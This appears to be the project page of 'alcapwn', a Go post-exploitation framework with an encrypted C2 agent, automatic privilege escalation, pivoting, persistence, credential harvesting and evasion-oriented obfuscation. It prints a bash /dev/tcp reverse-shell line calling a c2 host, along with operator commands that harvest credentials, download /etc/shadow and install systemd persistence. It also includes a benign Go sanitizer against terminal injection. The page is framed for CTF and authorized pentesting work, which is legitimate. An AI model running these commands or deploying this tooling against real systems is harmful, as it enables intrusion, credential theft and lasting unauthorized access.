A post-exploitation framework with encrypted C2 agent, automatic recon, privilege escalation, pivoting, and cross-platform payload generation. Built for CTF and authorized pentesting.

Go 1.24+ | Linux / macOS | X25519 + AES-256-GCM | MIT license

Install

Pre-built binaries for Linux and macOS (amd64 / arm64) are attached to every GitHub release with SHA-256 checksums. No runtime dependencies.

one-liner (latest release)

# linux/amd64
$ curl -sL https://github.com/exec/alcapwn/releases/\
latest/download/alcapwn-linux-amd64.tar.gz \
  | tar xz && sudo mv alcapwn /usr/local/bin/

build from source

$ git clone https://github.com/exec/alcapwn
$ cd alcapwn
$ go build -o alcapwn .

operator modes

$ ./alcapwn -l 0.0.0.0:4444              # TCP listener
$ ./alcapwn -l 0.0.0.0:4444 --tls        # ephemeral TLS
$ ./alcapwn -l 0.0.0.0:4444 -r           # auto-recon on connect
alcapwn> listen http 0.0.0.0:8443 --tls  # HTTPS beacon listener

What it does

alcapwn is a post-exploitation framework that handles the full lifecycle: catch shells, deploy encrypted agents, recon targets, escalate privileges, pivot through networks, and persist access — all from one operator console managing up to 1024 sessions.

Encrypted C2 agent

Cross-compiled Go agent with X25519 key exchange and AES-256-GCM per-session encryption. TCP and HTTP transports with jitter, certificate pinning, and XOR config obfuscation.

Automatic recon

HMAC-authenticated bash recon script discovers SUID/SGID binaries, sudo rules, capabilities, cron jobs, Docker sockets, credentials, and CVEs. Parsed into structured findings in seconds.

Auto privilege escalation

A 74-entry exploit dataset covers GTFOBins, sudo, capabilities, cron, CVEs (Baron Samedit, PwnKit), Docker, and Windows privesc. The exploit auto command walks the candidates until one yields root.

Network pivoting

SOCKS5 proxy and TCP port forwarding through any session. Scan internal networks from the agent. Works with proxychains.

Persistence

One-command persistence via cron, bashrc, SSH key, systemd, setuid (Linux) or registry/scheduled task (Windows). Reconnecting sessions auto-label by IP.

Credential harvesting

Agent-side harvest of SSH keys, shell history, .env files, AWS credentials, git configs (Linux) and PowerShell history, env, SSH (Windows). Streamed back encrypted.

Cross-platform agents

The generate command (for example generate linux amd64) cross-compiles agents for 6 targets (Linux amd64/arm64/armv7/i386, macOS x86_64/aarch64). A built-in minishell serves as a fallback when the target has no system shell.

Operator security

Terminal injection defense (C1 codes, OSC 52, APC/DCS stripping), per-listener IP firewalls with CIDR, and ANSI-safe output for all remote data.
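A sanitizer for the terminal injection defense named above, written as an added example rather than alcapwn's own code: it strips C1 codes, OSC (including OSC 52 clipboard writes), APC and DCS strings, and every other escape before remote data reaches the operator's terminal. The policy details (colour codes are dropped too, an unterminated string swallows the rest of the input) are this example's assumptions.

```go
package main

import "strings"

// skipString returns the index past the BEL, 8-bit ST (0x9C) or ESC \ that ends a
// control string whose payload starts at r[i]; an unterminated string eats the rest.
func skipString(r []rune, i int) int {
	for ; i < len(r); i++ {
		if r[i] == 0x07 || r[i] == 0x9C {
			return i + 1
		}
		if r[i] == 0x1B && i+1 < len(r) && r[i+1] == '\\' {
			return i + 2
		}
	}
	return i
}

// Sanitize makes untrusted remote output safe to print. Policy (this example's
// assumption, not alcapwn's exact rules): control strings (OSC incl. OSC 52, DCS,
// APC, PM, SOS) are cut through their terminator, C1 codes are treated as their
// 7-bit ESC forms, and any other escape or C0 control except \t \n \r is dropped.
func Sanitize(s string) string {
	r := []rune(s)
	var out strings.Builder
	for i := 0; i < len(r); {
		c := r[i]
		if c >= 0x80 && c <= 0x9F { // a C1 control equals ESC + (c-0x40); rewrite so one scanner covers both
			r = append(r[:i], append([]rune{0x1B, c - 0x40}, r[i+1:]...)...)
			c = 0x1B
		}
		switch {
		case c == 0x1B && i+1 < len(r) && strings.ContainsRune("PX]^_", r[i+1]):
			i = skipString(r, i+2) // DCS, SOS, OSC, PM, APC: drop introducer and payload
		case c == 0x1B && i+1 < len(r) && r[i+1] == '[': // CSI: skip parameters, then the final byte
			i += 2
			for i < len(r) && r[i] >= 0x20 && r[i] <= 0x3F {
				i++
			}
			i++
		case c == 0x1B:
			i += 2 // any other escape (ESC c reset, a bare C1 such as NEL, ...)
		case c < 0x20 && c != '\t' && c != '\n' && c != '\r', c == 0x7F:
			i++ // remaining C0 controls and DEL
		default:
			out.WriteRune(c)
			i++
		}
	}
	return out.String()
}
```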

Two paths to the same console

reverse shell (PTY)

# target runs:
$ bash -i >& /dev/tcp/c2/4444 0>&1

# alcapwn auto-upgrades to PTY
# [+] Session 1 ready

generated agent (encrypted)

alcapwn> generate linux amd64 \
  --lhost 10.0.0.1 --obfuscate

# deploy agent-linux-amd64 to target
# [+] Agent 1 ready (AES-256-GCM)

Both session types share the same operator commands:

alcapwn> recon 1                # structured recon (or -r at startup)
alcapwn> exploit auto 1         # walk all privesc candidates
# [+] ROOT via suid_python3 (euid=0)

alcapwn> creds 1                # harvest credentials
alcapwn> scan 1 10.0.0.0/24     # scan internal network from target
alcapwn> pivot 1 --socks5 1080  # SOCKS5 proxy through session
alcapwn> persist 1 systemd      # install persistence
alcapwn> use 1                  # interactive shell (Ctrl+D to background)
alcapwn> download 1 /etc/shadow
alcapwn> export 1 --format json findings.json

Shipped and what's next

  • Agent
    Cross-platform C2 agent with encrypted transport
    Go agent for 6 targets. X25519 + AES-256-GCM. TCP and HTTP/S transports with jitter, cert pinning, reconnect.
  • Crypto
    End-to-end encrypted channels
    ECDH key exchange, HKDF-SHA256 key derivation, per-direction AES-256-GCM with AAD binding and NIST nonce limits.
  • Callbacks
    HTTP/S beacon infrastructure
    HTTP listener with custom registration/beacon paths, TLS, browser-like headers, configurable intervals and jitter.
  • Pivoting
    SOCKS5 proxy and TCP forwarding
    Route traffic through sessions to reach internal networks. Agent-side port scanning with concurrent TCP connect.
  • Obfuscation
    XOR config encoding and stripped builds
    C2 address hidden from strings(1). Builds stripped with -s -w. Custom User-Agent and URI paths for traffic blending.
  • Post-Exploit
    Credential harvesting (Linux + Windows)
    SSH keys, shell history, .env files, AWS creds, git configs, PowerShell history. Agent-side harvest, encrypted exfil.
  • Recon
    Automated recon + 74-entry exploit database
    HMAC-authenticated script, structured parser, GTFOBins/CVE matching, auto privilege escalation. Works on PTY and agent sessions.
  • Modules
    Plugin module system planned
    Loadable server/agent modules for keylogging, screenshots, clipboard access. Agent modules compiled in at generate time.
  • Staging
    Multi-stage payload delivery planned
    Stage0 dropper to stage1 loader to stage2 full agent, with integrity verification between stages.
  • Profiles
    Malleable C2 profiles planned
    Customize traffic patterns, endpoints, headers, and timing to mimic legitimate services.
  • Windows
    Windows operator console
    Platform abstractions for stdin polling and signal handling. Agent sessions already work; PTY sessions need stubs.